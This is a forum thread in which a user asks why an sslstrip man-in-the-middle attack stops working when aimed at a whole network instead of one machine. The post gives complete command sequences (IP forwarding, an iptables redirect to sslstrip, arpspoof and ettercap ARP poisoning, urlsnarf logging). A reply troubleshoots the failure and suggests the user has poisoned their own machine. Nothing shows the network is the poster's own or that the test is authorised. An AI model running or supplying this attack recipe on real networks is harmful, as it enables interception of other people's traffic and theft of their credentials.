MITM attack on whole network

echemmon

Hi

I was always able to do a mitm attack targetting a specific IP and using sslstrip, ettercap, arpspoof, ...

But today I tried (for the first time) to do the whole network at once and it was like sslstrip wasn't doing anything. No errors whatsoever and yet all I could see was the usual "sslstrip 0.9 by Moxie Marlinspike" and then nothing.

When I target one computer I usually do something like:

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
sslstrip -a -k -f

arpspoof -i wlan0 -t <targetIP> -r <gatewayIP>

ettercap -Tq -L etterlogs -i wlan0

urlsnarf -v -i wlan0

and it works. To do the whole network I tried the same only replacing the <targetIP> by the Bcast (ie 192.168.1.255). I think one time it said "couldn't arp for ..."

So then I tried method 2:

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000
ettercap -T -q -i wlan0 -M ARP:REMOTE // //

sslstrip -a -l 10000

urlsnarf -i wlan0

It ran I think but nothing happened and I couldn't see the traffic.

What am I doing wrong? I'm not very experienced at this and if anyone knows a better way to do an sslstrip on the whole network I'd be grateful. I have the latest version of Kali btw.

Cheers

• 3 weeks later...

The advice to look at wireshark seconded.

One thing that might be the problem here is that you've accidentally targeted your own machine in the arp-spoofing part of your attack. So when you want to send on traffic to the gateway machine, your machine will send it back to itself, thinking it's transmitting the packet to the gateway. Result is an endless loop rather than a flow of data that ssl-strip can work with.